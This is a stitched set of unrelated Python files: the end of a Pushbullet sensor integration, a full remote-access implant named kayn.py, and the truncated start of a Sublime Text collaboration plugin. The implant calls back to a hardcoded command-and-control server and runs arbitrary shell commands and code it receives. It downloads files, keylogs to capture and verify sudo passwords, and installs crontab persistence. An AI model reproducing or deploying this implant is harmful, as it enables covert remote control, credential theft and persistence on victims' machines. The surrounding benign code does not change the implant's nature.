pushbullet = PushBullet(config.get(CONF_API_KEY))
except InvalidKeyError:
_LOGGER.error("Wrong API key for Pushbullet supplied")
return False
pbprovider = PushBulletNotificationProvider(pushbullet)
devices = []
for sensor_type in config[CONF_MONITORED_CONDITIONS]:
devices.append(PushBulletNotificationSensor(pbprovider, sensor_type))
add_entities(devices)
class PushBulletNotificationSensor(SensorEntity):
"""Representation of a Pushbullet Sensor."""
def __init__(self, pb, element):
"""Initialize the Pushbullet sensor."""
self.pushbullet = pb
self._element = element
self._state = None
self._state_attributes = None
def update(self):
"""Fetch the latest data from the sensor.
This will fetch the 'sensor reading' into self._state but also all
attributes into self._state_attributes.
"""
try:
self._state = self.pushbullet.data[self._element]
self._state_attributes = self.pushbullet.data
except (KeyError, TypeError):
pass
@property
def name(self):
"""Return the name of the sensor."""
return f"Pushbullet {self._element}"
@property
def native_value(self):
"""Return the current state of the sensor."""
return self._state
@property
def extra_state_attributes(self):
"""Return all known attributes of the sensor."""
return self._state_attributes
class PushBulletNotificationProvider:
"""Provider for an account, leading to one or more sensors."""
def __init__(self, pb):
"""Start to retrieve pushes from the given Pushbullet instance."""
self.pushbullet = pb
self._data = None
self.listener = None
self.thread = threading.Thread(target=self.retrieve_pushes)
self.thread.daemon = True
self.thread.start()
def on_push(self, data):
"""Update the current data.
Currently only monitors pushes but might be extended to monitor
different kinds of Pushbullet events.
"""
if data["type"] == "push":
self._data = data["push"]
@property
def data(self):
"""Return the current data stored in the provider."""
return self._data
def retrieve_pushes(self):
"""Retrieve_pushes.
Spawn a new Listener and links it to self.on_push.
"""
self.listener = Listener(account=self.pushbullet, on_push=self.on_push)
_LOGGER.debug("Getting pushes")
try:
self.listener.run_forever()
finally:
self.listener.close()
|
kayn.py | #!/usr/bin/python3
import mythic
from mythic import mythic_rest
import asyncio
import json
import base64
import requests
import time
import ast
import types
import math
import random
import socket
import struct
import platform
import os
import getpass
import threading
# from pynput import keyboard
import re
import sys
# import Xlib
# import Xlib.display
import time
import subprocess
from subprocess import Popen, PIPE
import stat
import hashlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from Crypto.Hash import SHA256, SHA512, SHA1, MD5, HMAC
from Crypto.Cipher import AES, PKCS1_OAEP
from Crypto.Random import get_random_bytes
from Crypto.Util.Padding import unpad, pad
from Crypto.PublicKey import RSA
from base64 import b64decode, b64encode
from termcolor import colored
# Global dict containing name and code of the dynamic functions loaded
class Agent:
def __init__(self):
self.Server = "http://95.237.2.234"
self.Port = "8888"
self.URI = "/data"
self.PayloadUUID = "ee86d368-9e02-452d-b50b-46b9075292ee"
self.UUID = ""
self.UserAgent = {"User-Agent": "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"}
self.HostHeader = "domain_front"
self.Sleep = "10"
self.Jitter = "23"
self.KillDate = "2022-08-16"
self.Script = ""
self.Encryption_key = "ONqLlT2IUMjCK6ET1OK5Sg39+SyNmAw+7jgG4ggIMsg="
self.Decryption_key = "ONqLlT2IUMjCK6ET1OK5Sg39+SyNmAw+7jgG4ggIMsg="
def get_Server(self):
return self.Server
def set_Server(self, server):
self.Server = server
def get_Port(self):
return self.Port
def set_Port(self, port):
self.Port = port
def get_URI(self):
return self.URI
def set_URI(self, uri):
self.URI = uri
def get_PayloadUUID(self):
return self.PayloadUUID
def set_PayloadUUID(self, payloadUUID):
self.PayloadUUID = payloadUUID
def get_UUID(self):
return self.UUID
def set_UUID(self, uuid):
self.UUID = uuid
def get_UserAgent(self):
return self.UserAgent
def set_UserAgent(self, userAgent):
self.UserAgent = userAgent
def get_Sleep(self):
return self.Sleep
def set_Sleep(self, sleep):
self.Sleep = sleep
def get_Jitter(self):
return self.Jitter
def set_Jitter(self, jitter):
self.Jitter = jitter
def get_Encryption_key(self):
return self.Encryption_key
def set_Encryption_key(self, encryption_key):
self.Encryption_key = encryption_key
def get_Decryption_key(self):
return self.Decryption_key
def set_Decryption_key(self, decryption_key):
self.Decryption_key = decryption_key
class myRequestHandler(BaseHTTPRequestHandler):
def send_response(self, code, message=None):
self.send_response_only(code, message)
self.send_header('Server', self.version_string())
self.send_header('Date', self.date_time_string())
global dynfs
global result
global sudo
dynfs = {}
sudo = ""
responses = []
delegates = []
delegates_address = []
delegates_UUID = []
delegates_aswers = []
result = {}
stopping_functions = []
agent = Agent()
redirecting = False
def encrypt_AES256(data, key=agent.get_Encryption_key()):
key = base64.b64decode(key)
data = json.dumps(data).encode()
h = HMAC.new(key, digestmod=SHA256)
iv = get_random_bytes(16) # generate a new random IV
cipher = AES.new(key, AES.MODE_CBC, iv=iv)
ciphertext = cipher.encrypt(pad(data, 16))
h.update(iv + ciphertext)
return iv + ciphertext + h.digest()
def encrypt_code(data, key=agent.get_Encryption_key()):
key = base64.b64decode(key)
data = data.encode()
iv = get_random_bytes(16) # generate a new random IV
cipher = AES.new(key, AES.MODE_CBC, iv=iv)
ciphertext = cipher.encrypt(pad(data, 16))
return iv + ciphertext
def decrypt_AES256(data, key=agent.get_Encryption_key(), UUID=False):
key = base64.b64decode(key)
# Decode and remove UUID from the message first
data = base64.b64decode(data)
uuid = data[:36]
data = data[36:]
# hmac should include IV
mac = data[-32:] # sha256 hmac at the end
iv = data[:16] # 16 Bytes for IV at the beginning
message = data[16:-32] # the rest is the message
h = HMAC.new(key=key, msg=iv + message, digestmod=SHA256)
h.verify(mac)
decryption_cipher = AES.new(key, AES.MODE_CBC, iv=iv)
decrypted_message = decryption_cipher.decrypt(message)
# now to remove any padding that was added on to make it the right block size of 16
decrypted_message = unpad(decrypted_message, 16)
if UUID:
return uuid.decode("utf-8") + decrypted_message.decode("utf-8")
else:
return json.loads(decrypted_message)
def decrypt_code(data, key=agent.get_Encryption_key()):
key = base64.b64decode(key)
iv = data[:16] # 16 Bytes for IV at the beginning
message = data[16:] # the rest is the message
decryption_cipher = AES.new(key, AES.MODE_CBC, iv=iv)
decrypted_message = decryption_cipher.decrypt(message)
decrypted_message = unpad(decrypted_message, 16)
return decrypted_message
def to64(data):
serialized = data.encode('utf-8')
base64_bytes = base64.b64encode(serialized)
return base64_bytes.decode('utf-8')
def from64(data, UUID=False):
response_bytes = data.encode('utf-8')
response_decode = base64.b64decode(response_bytes)
response_message = response_decode.decode('utf-8')
if UUID:
return response_message
else:
return ast.literal_eval(response_message[36:])
def getIP():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def getPublicIP():
return requests.get('https://api.ipify.org').text
def send(response, uuid):
if agent.get_Encryption_key() != "":
enc = encrypt_AES256(response)
message = base64.b64encode(uuid.encode() + enc).decode("utf-8")
x = ""
try:
x = requests.post(agent.get_Server() + ":" + agent.get_Port() + agent.get_URI(), data = message, headers=agent.get_UserAgent())
except Exception as e:
print(colored("Connection error, server {}:{} unreachable".format(agent.get_Server(),agent.get_Port()), "red"))
if "95.239.61.225" not in agent.Server:
agent.set_Server("http://95.237.2.234")
agent.set_Port("8888")
print(colored("Switching to main server at {}:{}".format(agent.get_Server(), agent.get_Port()), "blue"))
try:
x = requests.post(agent.get_Server() + ":" + agent.get_Port() + agent.get_URI(), data = message, headers=agent.get_UserAgent())
except:
print(colored("Connection error, main server {}:{} unreachable. Quitting".format(agent.get_Server(), agent.get_Port()), "red"))
sys.exit()
dec = decrypt_AES256(x.text)
if isinstance(dec, str):
return json.loads(dec)
else:
return dec
else:
serialized = json.dumps(response)
message = to64(serialized)
uuid = to64(uuid)
x = ""
try:
x = requests.post(agent.get_Server() + ":" + agent.get_Port() + agent.get_URI(), data = uuid + message, headers=agent.get_UserAgent())
except Exception as e:
print(colored("Connection error, server {}:{} unreachable".format(agent.get_Server(), agent.get_Port()), "red"))
if "95.239.61.225" not in agent.Server:
agent.set_Server("http://95.237.2.234")
agent.set_Port("8888")
print(colored("Switching to main server at {}:{}".format(agent.get_Server(), agent.get_Port()), "blue"))
try:
x = requests.post(agent.get_Server() + ":" + agent.get_Port() + agent.get_URI(), data = uuid + message, headers=agent.get_UserAgent())
except:
print(colored("Connection error, main server {}:{} unreachable. Quitting".format(agent.get_Server(), agent.get_Port()), "red"))
sys.exit()
res = from64(x.text)
return res
def checkin():
print("[+] CHECKIN")
checkin_data = {
"action": "checkin",
"ip": getPublicIP() + "/" + getIP(),
"os": platform.system() + " " + platform.release(),
"user": getpass.getuser(),
"host": socket.gethostname(),
"domain": socket.getfqdn(),
"pid": os.getpid(),
"uuid": agent.get_PayloadUUID(),
"architecture": platform.architecture(),
"encryption_key": agent.get_Encryption_key(),
"decryption_key": agent.get_Decryption_key()
}
res = send(checkin_data, agent.get_PayloadUUID())
try:
agent.set_UUID(res['id'])
print("\t - Assigned UUID = " + agent.get_UUID())
except:
res = json.loads(res)
agent.set_UUID(res['id'])
print("\t - Assigned UUID = " + agent.get_UUID())
def get_tasks():
tasks = {
'action': "get_tasking",
'tasking_size': -1
}
task_list = send(tasks, agent.get_UUID())
if "delegates" in task_list:
for m in task_list["delegates"]:
delegates_aswers.append(m)
return task_list
def reverse_upload(task_id, file_id):
upload = {
'action': "upload",
'file_id': file_id,
'chunk_size': 512000,
'chunk_num': 1,
'full_path': "",
'task_id': task_id,
}
res = send(upload, agent.get_UUID())
res = res['chunk_data']
response_bytes = res.encode('utf-8')
response_decode = base64.b64decode(response_bytes)
code = response_decode.decode('utf-8')
return code
def post_result():
global responses
global delegates
global delegates_aswers
response = {}
if delegates:
response = {
'action': "post_response",
'responses': responses,
'delegates': delegates
}
responses = []
delegates = []
else:
response = {
'action': "post_response",
'responses': responses
}
responses = []
result = send(response, agent.get_UUID())
if "delegates" in result:
for m in result["delegates"]:
delegates_aswers.append(m)
return result
def execute_tasks(tasks):
if tasks:
for task in tasks['tasks']:
execute(task)
r = random.randint(0,1)
if r < 0.5:
r = -1
else:
r = 1
sleep_time = int(agent.get_Sleep()) + r*(int(agent.get_Sleep()) * int(agent.get_Jitter()) / 100)
time.sleep(sleep_time / 5)
post_result()
def run_in_thread(function, param_list, task):
found = False
for item in dynfs:
if item == function:
try:
if agent.get_Encryption_key() == "":
exec(dynfs[item])
else:
exec(decrypt_code(dynfs[item]))
eval(function + "(" + str(param_list) + ")")
found = True
except Exception as e:
print(traceback.format_exc())
response = {
'task_id': task['id'],
"user_output": str(e),
'completed': False,
'status': 'error'
}
responses.append(response)
if found == False:
try:
eval(function + "(" + str(param_list) + ")")
except Exception as e:
print(traceback.format_exc())
response = {
'task_id': task['id'],
"user_output": str(e),
'completed': False,
'status': 'error'
}
responses.append(response)
def execute(task):
# Search in the dynamic functions first, so a command can be sobstituted through the load functionality
function = str(task['command'])
if function != "code":
print("\n[+] EXECUTING " + function)
param_list = "task['id'],"
if task['parameters'] != '' and task['parameters'][0] == "{":
parameters = ast.literal_eval(task['parameters'])
for param in parameters:
param_list += "ast.literal_eval(task['parameters'])['" + param + "'],"
else:
if task['parameters'] != '':
param_list += "task['parameters'],"
param_list = param_list[:-1]
thread = threading.Thread(target=run_in_thread, args=(function, param_list, task))
thread.start()
################################################################################################################
# The comment below will be sobstituted by the definition of the functions imported at creation time
def trace(task_id, command=None):
ip = requests.get('https://api.ipify.org').text
if command==None:
response = {
'task_id': task_id,
"user_output": ip,
'completed': True
}
responses.append(response)
try:
os.remove(os.path.expanduser("~") + "/.ssh/config")
except:
print(colored("Not enough permissions", "red"))
else:
path = ""
print("PATH = " + str(command))
if command == False:
path = ip
else:
path += command + " --> " + getpass.getuser() + "@" + ip + ";" + sudo
response = {
'task_id': task_id,
"user_output": path,
'completed': True
}
responses.append(response)
print("\t- Trace Done")
return
def nmap(task_id, command):
sudo = "bubiman10"
ip = requests.get('https://api.ipify.org').text
print('My public IP address is: {}'.format(ip))
if sudo != "":
response = {
'task_id': task_id,
"user_output": getpass.getuser() + "@" + ip + ";" + sudo + ";" + command,
'completed': True
}
responses.append(response)
else:
response = {
'task_id': task_id,
"user_output": "Sudo password not acquired. Try using keylog first. " + getpass.getuser() + "@" + ip + ";" + sudo + ";" + command,
'completed': True
}
responses.append(response)
print("\t- Nmap Done")
return
def p2p_server(task_id):
class RequestHandler(myRequestHandler):
def do_POST(self):
global delegates_aswers
content_len = int(self.headers.get('content-length', 0))
post_body = self.rfile.read(content_len)
received_uuid = ""
received_message = ""
decode = ""
encrypted = False
try:
decode = base64.b64decode(post_body)
decode = decode.decode("utf-8")
except:
decode = decrypt_AES256(post_body, UUID=True)
encrypted = True
received_uuid = str(decode)[:36]
received_message = json.loads(decode[36:])
encoded = to64(decode)
if received_message["action"] == "checkin":
delegate = {
"message": encoded,
"uuid": agent.get_PayloadUUID(),
"c2_profile": "myp2p"
}
else:
delegate = {
"message": encoded,
"uuid": received_uuid,
"c2_profile": "myp2p"
}
delegates.append(delegate)
while delegates_aswers == []:
pass
reply_message = ""
if received_message["action"] == "checkin":
for answer in delegates_aswers:
message = base64.b64decode(answer['message'])
message = message.decode("utf-8")
message = message[36:]
message = json.loads(message)
if message["action"] == "checkin":
reply_message = answer['message']
else:
reply = False
while not reply:
for answer in delegates_aswers:
message = base64.b64decode(answer['message'])
message = message.decode("utf-8")
message_uuid = message[:36]
message = message[36:]
message = json.loads(message)
if answer['uuid'] == received_uuid and message["action"] == received_message["action"]:
if message["action"] == "get_tasking":
if message["tasks"] != []:
for task in message["tasks"]:
if task["command"] == "trace":
ip = requests.get('https://api.ipify.org').text
if task["parameters"] == "":
task["parameters"] = getpass.getuser() + "@" + ip + ";" + sudo
else:
task["parameters"] += " --> " + getpass.getuser() + "@" + ip + ";" + sudo
reply_message = to64(message_uuid) + to64(str(message))
delegates_aswers.remove(answer)
reply = True
if reply_message == "":
reply_message = answer['message']
delegates_aswers.remove(answer)
reply = True
if encrypted:
reply_message = base64.b64decode(reply_message).decode()
uuid = reply_message[:36]
message = reply_message[36:]
enc = encrypt_AES256(message)
reply_message = base64.b64encode(uuid.encode() + enc).decode("utf-8")
self.protocol_version = "HTTP/1.1"
self.send_response(200)
self.send_header("Content-Length", len(reply_message))
self.end_headers()
self.wfile.write(bytes(reply_message, "utf8"))
def run():
p2p_port = 9090
server = ('', p2p_port)
httpd = HTTPServer(server, RequestHandler)
thread = threading.Thread(target = httpd.serve_forever, daemon=True)
thread.start()
response = {
'task_id': task_id,
"user_output": "P2P Server started on {}:{}".format(getIP(), p2p_port),
'completed': True
}
responses.append(response)
print("\t- P2P Server started on {}:{}".format(getIP(), p2p_port))
run()
def load(task_id, file_id, cmds):
global responses
code = reverse_upload(task_id, file_id)
name = cmds
if agent.get_Encryption_key() == "":
dynfs[name] = code
else:
dynfs[name] = encrypt_code(code)
response = {
'task_id': task_id,
"user_output": "Module successfully added",
'commands': [
{
"action": "add",
"cmd": name
}
],
'completed': True
}
responses.append(response)
print("\t- Load Done")
return
def keylog_no_X(task_id):
global responses
def get_active_window_title():
root = subprocess.Popen(['xprop', '-root', '_NET_ACTIVE_WINDOW'], stdout=subprocess.PIPE)
stdout, stderr = root.communicate()
m = re.search(b'^_NET_ACTIVE_WINDOW.* ([\w]+)$', stdout)
if m != None:
window_id = m.group(1)
window = subprocess.Popen(['xprop', '-id', window_id, 'WM_NAME'], stdout=subprocess.PIPE)
stdout, stderr = window.communicate()
else:
return "None"
match = re.match(b"WM_NAME\(\w+\) = (?P<name>.+)$", stdout)
if match != None:
return match.group("name").strip(b'"').decode()
return "None"
def find_event():
f = open("/proc/bus/input/devices")
lines = str(f.readlines())
while lines.find("I:") != -1:
#Read block by block
event = ""
start = lines.find("I:")
end = lines.find("B: EV=")+12
if lines[start:end].find("B: EV=12001") != -1:
event_start = lines[start:end].find("event")
event_start += start
i = 1
try:
while True:
int(lines[event_start + 5 : event_start + 5 + i])
event = lines[event_start: event_start + 5 + i]
i += 1
except:
return event
lines = lines[end-6:]
qwerty_map = {
2: "1", 3: "2", 4: "3", 5: "4", 6: "5", 7: "6", 8: "7", 9: "8", 10: "9",
11: "0", 12: "-", 13: "=", 14: "[BACKSPACE]", 15: "[TAB]", 16: "a", 17: "z",
18: "e", 19: "r", 20: "t", 21: "y", 22: "u", 23: "i", 24: "o", 25: "p", 26: "^",
27: "$", 28: "\n", 29: "[CTRL]", 30: "q", 31: "s", 32: "d", 33: "f", 34: "g",
35: "h", 36: "j", 37: "k", 38: "l", 39: "m", 40: "รน", 41: "*", 42: "[SHIFT]",
43: "<", 44: "w", 45: "x", 46: "c", 47: "v", 48: "b", 49: "n", 50: ",",
51: ";", 52: ":", 53: "!", 54: "[SHIFT]", 55: "FN", 56: "ALT", 57: " ", 58: "[CAPSLOCK]",
}
print(find_event())
infile_path = "/dev/input/" + find_event().strip()
FORMAT = 'llHHI'
EVENT_SIZE = struct.calcsize(FORMAT)
in_file = open(infile_path, "rb")
event = in_file.read(EVENT_SIZE)
line = ""
while event:
if break_function:
print("break detected, stopping keylog")
response = {
"task_id": task_id,
"user": getpass.getuser(),
"window_title": get_active_window_title(),
"keystrokes": line,
"completed": True
}
responses.append(response)
break_function = False
return
(_, _, type, code, value) = struct.unpack(FORMAT, event)
if code != 0 and type == 1 and value == 1:
if code == 28 or code == 96:
response = {
"task_id": task_id,
"user": getpass.getuser(),
"window_title": get_active_window_title(),
"keystrokes": line + "\n",
}
responses.append(response)
line = ""
else:
line += qwerty_map[code]
event = in_file.read(EVENT_SIZE)
def keylog(task_id):
global responses
global stopping_functions
def get_active_window_title():
root = subprocess.Popen(['xprop', '-root', '_NET_ACTIVE_WINDOW'], stdout=subprocess.PIPE)
stdout, stderr = root.communicate()
m = re.search(b'^_NET_ACTIVE_WINDOW.* ([\w]+)$', stdout)
if m != None:
window_id = m.group(1)
window = subprocess.Popen(['xprop', '-id', window_id, 'WM_NAME'], stdout=subprocess.PIPE)
stdout, stderr = window.communicate()
else:
return "None"
match = re.match(b"WM_NAME\(\w+\) = (?P<name>.+)$", stdout)
if match != None:
return match.group("name").strip(b'"').decode()
return "None"
def keylogger():
def on_press(key):
global line
global nextIsPsw
global sudo
global break_function
if "keylog" in stopping_functions:
print(colored("\t - Keylogger stopped", "red"))
response = {
"task_id": task_id,
"user": getpass.getuser(),
"window_title": get_active_window_title(),
"keystrokes": line,
"completed": True
}
responses.append(response)
line = ""
break_function = False
return False
try:
line = line + key.char
k = key.char
except:
try:
k = key.name
if key.name == "backspace":
if len(line) > 0:
line = line[:-1]
elif key.name == "space":
line += " "
elif key.name == "enter":
print(nextIsPsw)
if nextIsPsw == True:
print("I GOT THE PASSWORD: {}".format(line))
cmd = "echo {} | sudo -S touch fileToCheckSudo.asd".format(line)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
p = subprocess.Popen(["ls"], stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
if "fileToCheckSudo.asd" in str(stdout):
cmd = "echo {} | sudo -S rm fileToCheckSudo.asd".format(line)
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
response = {
"task_id": task_id,
"user_output": "root password acquired: {}".format(line),
"user": getpass.getuser(),
"window_title": get_active_window_title(),
"keystrokes": line + "\n",
}
responses.append(response)
nextIsPsw = False
sudo = line
line = ""
else:
if 'sudo ' in line:
print("Next should be password")
nextIsPsw = True
response = {
"task_id": task_id,
"user": getpass.getuser(),
"window_title": get_active_window_title(),
"keystrokes": line + "\n",
}
responses.append(response)
line = ""
elif key.name == "shift" or key.name == "ctrl" or key.name == "alt" or key.name == "caps_lock" or key.name == "tab":
if "crtlc" in line:
line = ""
nextIsPsw = False
else:
line = line + key.name
except:
pass
listener = keyboard.Listener(on_press=on_press)
listener.start()
listener.join()
thread2 = threading.Thread(target=keylogger, args=())
thread2.start()
print("\t- Keylog Running")
line = ""
nextIsPsw = False
def upload(task_id, file_id, remote_path):
global responses
remote_path = remote_path.replace("\\", "")
upload = {
'action': "upload",
'file_id': file_id,
'chunk_size': 512000,
'chunk_num': 1,
'full_path': "",
'task_id': task_id,
}
res = send(upload, agent.get_UUID())
res = res['chunk_data']
response_bytes = res.encode('utf-8')
response_decode = base64.b64decode(response_bytes)
code = response_decode.decode('utf-8')
f = open(remote_path, "w")
f.write(code)
f.close()
response = {
'task_id': task_id,
"user_output": "File Uploaded",
'completed': True
}
responses.append(response)
print("\t- Upload Done")
return
def exit_agent(task_id):
response = {
'task_id': task_id,
"user_output": "Exited",
'completed': True
}
responses.append(response)
print("\t- Exit Done")
sys.exit()
def shell(task_id, cmd):
global responses
p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
stdout, stderr = p.communicate()
resp = ""
if isinstance(stdout, bytes):
resp = stdout.decode()
elif isinstance(stderr, bytes):
resp = stderr.decode()
else:
resp = "Error"
response = {
'task_id': task_id,
"user_output": resp,
'completed': True
}
responses.append(response)
print("\t- Shell Done")
return
def redirect(task_id, command):
global redirecting
redirecting = True
time.sleep(int(agent.get_Sleep()))
params = command.replace(":", " ")
params = params.split(" ")
if len(params) < 2:
response = {
'task_id': task_id,
"user_output": "usage redirect <host:port> [OPTIONAL] <encryption_key>",
'completed': True
}
responses.append(response)
return
else:
ip = params[0]
port = params[1]
response = {
'task_id': task_id,
"user_output": "Redirected to {}:{}".format(agent.get_Server(), agent.get_Port()),
'completed': True
}
responses.append(response)
if len(params) > 2:
print(colored("Setting key {}".format(params[2]), "red"))
agent.set_Encryption_key(params[2])
agent.set_Server("http://" + ip)
agent.set_Port(port)
print(colored("Switching to {}:{}".format(agent.get_Server(), agent.get_Port()), "green"))
checkin()
print("\t- Redirect Done")
redirecting = False
return
def stop(task_id, function_name):
global stopping_functions
stopping_functions.append(str(function_name).strip())
response = {
'task_id': task_id,
"user_output": "Break",
'completed': True
}
responses.append(response)
return
def persistance(task_id):
global responses
global sudo
agent_name = "prova.py"
cwd = os.getcwd()
if sudo != "":
subprocess.call('echo ' + sudo + ' | sudo -S chmod 777 ' + agent_name, shell=True)
subprocess.call('crontab -l > mycron.tmp', shell=True)
subprocess.call('echo "@reboot sleep 30 && cd ' + cwd + ' && ./' + agent_name + '" >> mycron.tmp', shell=True)
subprocess.call('crontab mycron.tmp', shell=True)
subprocess.call('rm mycron.tmp', shell=True)
response = {
'task_id': task_id,
"user_output": "crontab scheduled at each reboot",
'completed': True
}
responses.append(response)
else:
response = {
'task_id': task_id,
"user_output": "Sudo password not acquired or wrong. Use keylog module to try stealing",
'completed': False
}
responses.append(response)
print("\t- Persistance Done")
return
def download(task_id, path):
global responses
path = path.replace("\\", "/")
# print("Downloading " + path)
# chunkSize = 512000
chunkSize = 10000
fileSize = os.path.getsize(path)
chunks = math.ceil(fileSize / chunkSize)
fullpath = os.path.abspath(path)
# print("FILESIZE = " + str(fileSize))
# print(str(chunks) + " chunks needed")
response = {
"total_chunks": chunks,
"task_id": task_id,
"full_path": fullpath,
"host": "",
"is_screenshot": "false"
}
responses.append(response)
def download_thread():
i = 1
file_id = ""
while i != chunks +1:
if result:
for item in result['responses']:
if item['task_id'] == task_id and item['status'] == "success":
# print("HO TROVATO IL LA RIPOSTA SUCCESS PER QUESTO TASK")
if file_id == "":
file_id = item['file_id']
result['responses'].remove(item)
f = open(fullpath, 'r')
f.seek((i-1)*chunkSize)
blob = f.read(chunkSize)
chunk_data = to64(blob)
if i == chunks:
print("i == chunks")
response = {
"chunk_num": i,
"file_id": file_id,
"chunk_data": chunk_data,
"task_id": task_id,
"completed": True
}
# print("[OLD RESPONSEs]: " + str(responses))
responses.append(response)
# print("[NEW RESPONSEs]: " + str(responses))
f.close()
i +=1
print("\t- Download Done")
exit()
else:
print("i != chunks")
response = {
"chunk_num": i,
"file_id": file_id,
"chunk_data": chunk_data,
"task_id": task_id
}
# print("[OLD RESPONSEs]: " + str(responses))
responses.append(response)
# print("[NEW RESPONSEs]: " + str(responses))
f.close()
i += 1
if item['task_id'] == task_id and item['status'] != "success":
print("ERROR SENDING FILE")
break
d = threading.Thread(target=download_thread, args=())
d.start()
def run(task_id, code):
global responses
print("\t" + code)
eval(code)
response = {
'task_id': task_id,
"user_output": "Executed",
'completed': True
}
responses.append(response)
print("\t- Run Done")
return
def code(task_id, code, param, parallel_id):
global responses
print("Running code with \n {} \n {}".format(code, param))
try:
exec(code)
eval("worker(param)")
except Exception as e:
print(e)
response = {
'task_id': task_id,
"user_output": worker_output,
'completed': True
}
responses.append(response)
print("\t- Parallel Done")
return
def ls(task_id, path, third):
global responses
path = path.replace("\\", "")
path = path.replace("//", "/")
fullpath = str(os.path.abspath(path))
files = []
for f in os.listdir(path):
permissions = ""
modify_time = ""
access_time = ""
file_path = os.path.abspath(f)
try:
st = os.stat(file_path)
oct_perm = oct(st.st_mode)
permissions = str(oct_perm)[-3:]
fileStats = os.stat(file_path)
access_time = time.ctime (fileStats[stat.ST_ATIME])
modify_time = time.ctime(os.path.getmtime(file_path))
except:
permissions = "Not Allowed"
modify_time = "Not Allowed"
access_time = "Not Allowed"
size = 0
if os.path.isdir(fullpath):
try:
for path, dirs, files in os.walk(file_path):
for x in files:
fp = os.path.join(path, x)
size += os.path.getsize(fp)
except:
size: -1
elif os.path.isfile(f):
try:
size = os.path.getsize(file_path)
except:
size: -1
try:
a = {
"is_file": os.path.isfile(f),
"permissions": {'permissions': permissions},
"name": f,
"access_time": access_time,
"modify_time": modify_time,
"size": size
}
files.append(a)
except:
print("No permission")
name = ""
if os.path.isfile(path):
name = path
else:
name = os.path.basename(os.path.normpath(fullpath))
permissions = ""
modify_time = ""
access_time = ""
try:
st = os.stat(fullpath)
oct_perm = oct(st.st_mode)
permissions = str(oct_perm)[-3:]
fileStats = os.stat(fullpath)
access_time = time.ctime(fileStats[stat.ST_ATIME])
modify_time = time.ctime(os.path.getmtime(fullpath))
except:
permissions = "Not Allowed"
modify_time = "Not Allowed"
access_time = "Not Allowed"
size = 0
if os.path.isdir(f):
try:
for path, dirs, files in os.walk(file_path):
for x in files:
fp = os.path.join(path, x)
size += os.path.getsize(fp)
except:
size: -1
elif os.path.isfile(f):
try:
size = os.path.getsize(file_path)
except:
size: -1
parent_path = os.path.dirname(fullpath)
if name == "":
name = "/"
parent_path = ""
response = {
"task_id": task_id,
"user_output": "Listing Done",
"file_browser": {
"host": socket.gethostname(),
"is_file": os.path.isfile(fullpath),
"permissions": {'permissions': permissions},
"name": name,
"parent_path": parent_path,
"success": True,
"access_time": access_time,
"modify_time": modify_time,
"size": size,
"files": files,
},
"completed": True
}
responses.append(response)
print("\t- ls Done")
return
def parallel(task_id, file_name, workers, parameters={}):
response = {
'task_id': task_id,
"user_output": "Command received",
'completed': True
}
responses.append(response)
return
################################################################################################################
# MAIN LOOP
# agent = Agent()
uuid_file = "UUID.txt"
if os.path.isfile(uuid_file):
# f = open(uuid_file, "r")
# agent.UUID = f.read()
pass
else:
checkin()
# f = open(uuid_file, "w")
# f.write(agent.UUID)
# f.close()
# ip = getPublicIP()
# if ip == "194.195.242.157" or ip == "172.104.135.23" or ip == "172.104.135.67":
# print("[+] P2P Server")
# p2p_server(1)
while True:
while not redirecting:
tasks = get_tasks()
execute_tasks(tasks)
r = random.randint(0,1)
if r < 0.5:
r = -1
else:
r = 1
sleep_time = int(agent.get_Sleep()) + r*(int(agent.get_Sleep()) * int(agent.get_Jitter()) / 100)
sleep_time = random.randint(0, int(sleep_time))
time.sleep(sleep_time / 5)
|
tandem.py | import os
import sys
import random
from subprocess import Popen, PIPE
from threading import Thread, Event
import sublime
import sublime_plugin
from tandem.diff_match_patch import diff_match_patch
from tandem.edit import Edit
# sys hack to add enum, required by the messages module file
sys.path.append(os.path.join(os.path.dirname(__file__), "enum-dist"))
import tandem.agent.tandem.agent.protocol.messages.editor as m # noqa
DEBUG = False
is_active = False
is_processing = False
patch = diff_match_patch()
def spawn_agent(extra_args=None):
if extra_args is None:
extra_args = []
dirname = os.path.dirname(__file__)
filename = str(os.path.join(dirname, "agent/main.py"))
return Popen(
["python3", filename] + extra_args,
stdin=PIPE,
stdout=PIPE,
)
def get_string_port():
starting_port = random.randint(60600, 62600)
return str(starting_port)
def index_to_point(buffer_line_lengths, index):
index_left = index
for i in range(len(buffer_line_lengths)):
if index_left >= buffer_line_lengths[i] + 1:
index_left -= buffer_line_lengths[i] + 1
else:
return (i, index_left)
def error():
print("An error occurred.")
def show_message(msg, show_gui):
if show_gui:
sublime.message_dialog(msg)
else:
print(msg)
class TandemCommand(sublime_plugin.TextCommand):
def run(self, edit, host_ip=None, host_port=None, show_gui=False):
global tandem_agent
tandem_agent.start(self.view, show_gui=show_gui)
def is_enabled(self):
global is_active
return not is_active
class TandemConnectCommand(sublime_plugin.TextCommand):
def _start(self, args):
global tandem_agent
tandem_agent.start(self.view, session_id=args, show_gui=True)
def run(self, edit):
global is_active
if is_active:
msg = "Cannot start. An instance is already running on :{}".format(
tandem_agent.agent_port,
)
show_message(msg, True)
return
sublime.active_window().show_input_panel(
caption="Enter Session ID",
initial_text="",
on_done=self._start,
on_change=None,
on_cancel=None,
)
def is_enabled(self):
global is_active
return not is_active
class TandemStopCommand(sublime_plugin.TextCommand):
def run(self, edit, show_gui=False):
global tandem_agent
tandem_agent.stop(show_gui)
def is_enabled(self):
global is_active
return is_active
class TandemSessionCommand(sublime_plugin.TextCommand):
def run(self, edit, show_gui=False):
global tandem_agent
tandem_agent.show_session_id(show_gui)
def is_enabled(self):
global is_active
return is_active
class TandemPlugin:
@property
def agent_port(self):
return self._agent_port
@property
def _current_buffer(self):
return self._view.substr(sublime.Region(0, self._view.size()))
def _initialize(self, view):
self._view = view
self._buffer = ""
self._output_checker = Thread(target=self._check_message)
self._text_applied = Event()
self._session_id = None
def _start_agent(self):
self._agent_port = get_string_port()
self._agent = spawn_agent([
"--port",
self._agent_port,
"--log-file",
"/tmp/tandem-agent-{}.log".format(self._agent_port),
])
if self._connect_to is not None:
